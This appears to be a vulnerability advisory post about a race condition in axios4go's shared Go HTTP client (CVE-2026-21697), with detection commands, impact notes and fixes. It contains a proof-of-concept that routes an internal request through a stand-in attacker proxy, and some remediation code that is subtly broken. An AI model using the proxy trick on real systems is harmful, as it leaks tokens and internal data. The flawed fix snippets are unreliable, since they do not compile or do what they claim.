Listen to this Post
axios4go versions prior to 0.6.4 contain a race condition in their shared HTTP client configuration handling. The library maintains a global `defaultClient` variable, which is a pointer to a standard http.Client. During the execution of concurrent requests (e.g., using `GetAsync` or PostAsync), this global client is mutated without any synchronization mechanisms like mutexes. Specifically, the Transport, Timeout, and `CheckRedirect` fields of the shared `http.Client` are directly modified by different goroutines. This lack of locking creates a time-of-check-to-time-of-use (TOCTOU) vulnerability. If one request attempts to set a custom proxy (by modifying the Transport) while another request is in progress, the second request might unintentionally use the wrong proxy, or the client’s configuration could be left in an inconsistent state. This can lead to severe consequences, such as requests A sending sensitive authentication tokens to the server intended for request B, or a request meant for an internal service being routed through an external proxy. The vulnerability is particularly dangerous in microservice architectures where the same HTTP client is reused for requests to different backends with varying security contexts .
Platform: axios4go
Version: before 0.6.4
Vulnerability : race condition
Severity: HIGH
date: 2026-01-07
Prediction: already patched
What Undercode Say:
Analytics:
Search for the vulnerable package in Go modules go list -m -versions github.com/rezmoss/axios4go Check your go.mod file for the vulnerable version grep "axios4go" go.mod Use 'go mod why' to see why the module is needed go mod why -m github.com/rezmoss/axios4go EPSS Score for CVE-2026-21697 echo "EPSS Score: 0.11% (as of March 2026)" Vulnerability Query with grype (Anchore) grype dir:. --only-fixed
Exploit:
// Exploit Concept: Trigger the race condition by launching concurrent
// requests that modify the shared client's Transport (e.g., setting a proxy).
// This can cause request A to use the proxy intended for request B.
package main
import (
"fmt"
"net/http"
"net/url"
"sync"
"github.com/rezmoss/axios4go" // Vulnerable version < 0.6.4
)
func main() {
var wg sync.WaitGroup
// Attacker-controlled proxy
maliciousProxy, _ := url.Parse("http://attacker-proxy:8080")
// Request 1: Intended for internal service (no proxy)
wg.Add(1)
go func() {
defer wg.Done()
// This request might inherit the proxy from Request 2
axios4go.Get("http://internal-service.local/secret")
}()
// Request 2: Sets a malicious proxy
wg.Add(1)
go func() {
defer wg.Done()
// This mutates the global client's Transport
client := axios4go.GetHttpClient()
client.Transport = &http.Transport{Proxy: http.ProxyURL(maliciousProxy)}
axios4go.Get("http://example.com")
}()
wg.Wait()
fmt.Println("Race condition attempted.")
}
Protection:
1. Update to the patched version immediately go get github.com/rezmoss/[email protected] go mod tidy 2. If you cannot update, avoid using the global default client. Create a new client instance for each request or group of requests that require a specific configuration. cat << 'EOF' > safe_axios4go_usage.go package safe import ( "github.com/rezmoss/axios4go" "net/http" ) // Safe way: Create a new client instead of using the global one. func MakeSafeRequest(url string) { // Create a new http.Client with a specific timeout. customClient := &http.Client{Timeout: 10 time.Second} // Pass this client to axios4go's request functions if they support it, // or use the standard net/http client directly. // Note: axios4go's vulnerability is in its global defaultClient management. // Bypass axios4go for critical paths. req, _ := http.NewRequest("GET", url, nil) customClient.Do(req) } EOF 3. Implement static code analysis to forbid mutation of global HTTP clients. Example using Semgrep: semgrep --config 'p/golang' --pattern 'var $CLIENT = http.Client{...}' .
Impact:
- Integrity Violation: An attacker can cause requests to be routed through malicious proxies, enabling man-in-the-middle attacks where responses can be modified .
- Information Disclosure: Sensitive data like authentication tokens, API keys, and internal service responses can be leaked to external, attacker-controlled servers.
- Bypass Security Controls: Requests intended for internal networks (with no egress) could be forced to use a proxy, bypassing network segmentation.
- Unexpected Behavior: Concurrent requests can lead to unpredictable application behavior due to misconfigured `Timeout` and `CheckRedirect` settings, potentially causing denial of service or open redirection vulnerabilities.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

